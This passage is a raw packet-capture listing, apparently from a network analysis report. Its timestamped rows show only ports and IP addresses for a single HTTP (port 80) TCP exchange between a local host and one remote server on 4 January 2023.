Jan 4, 2023 16:47:45.251080990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251101017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251122952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251148939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251147985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251174927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251178980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251199007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251207113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251220942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251241922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251245022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251271009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251272917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251297951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251306057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251327038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251327991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251352072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251353979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251377106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251379013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251400948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251401901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251426935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251426935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251450062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251451969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251475096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251477003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251497984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251503944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251527071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251528978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251549959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251554012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251573086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251580000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251602888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251609087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251626968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251956940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.251980066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252003908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252022982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252027988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252057076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252074003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252108097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252127886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252151966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252155066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252178907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252178907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252193928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252204895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252221107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252229929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252259016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252262115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252283096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252290964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252309084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252310038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252331018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252336025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252355099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252362013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252386093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252388000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252398014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252412081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252434969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252435923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252459049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252461910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252473116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252492905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252511978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252537012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252538919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252559900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252566099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252583027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252599001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252607107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252620935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252634048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252635002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252657890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.252665997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252687931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.252703905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253119946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253140926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253159046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253180981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253195047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253202915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253227949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253232956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253249884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253267050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253283024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253300905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253308058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253333092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253334045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253356934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253362894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253381968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253391027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253408909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253432035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253439903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253454924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253468037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253479004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253501892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253503084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253528118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253530979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253551006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253563881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253576040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253582001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253602028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253606081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253626108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253628969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253643036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253650904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.253669024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.253696918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254157066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254179001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254198074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254221916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254229069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254245996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254257917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254267931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254288912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254292011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254312992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254333973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254354000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254359961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254373074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254375935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254394054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254396915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254414082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254421949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254435062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254451036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254455090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254472017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254477978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254488945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254498959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254513025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254519939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254532099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254540920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254554033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254560947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254575968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254582882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254595041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254602909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254620075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254622936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.254642010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254659891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.254681110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255112886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255140066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255158901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255177975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255197048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255204916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255217075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255235910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255242109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255254984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255263090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255275965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255294085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255295992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255316019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255321980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255338907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255359888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255376101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255378008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255397081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255398035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255419970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255435944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255439997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255455017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255460978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255481005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255492926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255501986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255521059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255523920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255541086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255557060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255561113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.255590916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.255609989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256040096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256061077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256079912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256098986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256102085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256119967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256125927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256139040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256141901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256162882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256174088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256182909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256201982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256208897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256222010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256241083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256239891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256263018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256272078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256283045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256302118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256306887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256330967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256331921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256355047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256357908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256376982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256376982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256398916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256402016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256418943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256422043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256439924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256445885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256460905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256469011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256481886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256493092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256501913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.256509066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256532907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.256556034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257024050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257044077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257062912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257081985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257097960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257133007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257214069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257234097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257252932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257275105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257293940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257294893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257317066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257318974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257337093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257344007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257358074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257376909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257378101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257397890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257410049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257417917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257446051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257476091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257523060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257570982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257810116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257831097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257850885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257858038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257870913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257891893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257901907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257917881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257931948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257937908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257956982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257966995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.257977962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257997036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.257997036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258017063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258027077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258061886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258164883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258184910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258204937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258224010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258234978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258244038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258250952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258265972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258285999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258294106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258306980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258326054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258332968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258353949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258383989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258733034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258754015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258799076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258820057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258820057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258840084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258850098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258860111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258881092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258898020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258898973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258919954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258930922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258939981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258954048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.258960009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258980036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.258999109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259011984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259027004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259027958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259059906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259090900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259120941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259140015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259159088 CET	80	49696	66.235.200.147	192.168.2.4
